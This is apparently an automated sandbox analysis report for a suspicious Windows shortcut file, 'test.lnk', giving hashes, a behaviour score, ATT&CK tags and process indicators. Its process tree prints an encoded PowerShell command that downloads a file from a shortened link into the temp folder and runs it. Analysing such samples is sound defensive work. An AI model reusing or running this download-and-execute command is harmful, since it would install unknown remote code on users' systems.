de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17/10/2024, 18:56

Target

test.lnk
Size

1KB
MD5

02e1f1ea7dc301147433623d31e5a294
SHA1

b882f489808747b6201b113d306a42d533ca229e
SHA256

de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
SHA512

3aa0615c43e1598e04af1208356c7b4f0d0310723f23837975141a46dc9191a9be0c2ddea95a56abbe335ce82a85f5f24a73982af8cb7051d622aaeb6b198554

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
584	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	584	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 584	2524	cmd.exe	32
PID 2524 wrote to memory of 584	2524	cmd.exe	32
PID 2524 wrote to memory of 584	2524	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\test.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:584

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/584-38-0x000007FEF635E000-0x000007FEF635F000-memory.dmp

Filesize
4KB

Download
memory/584-39-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/584-41-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/584-42-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/584-43-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/584-40-0x0000000002680000-0x0000000002688000-memory.dmp

Filesize
32KB

Download
memory/584-44-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/584-45-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/584-46-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download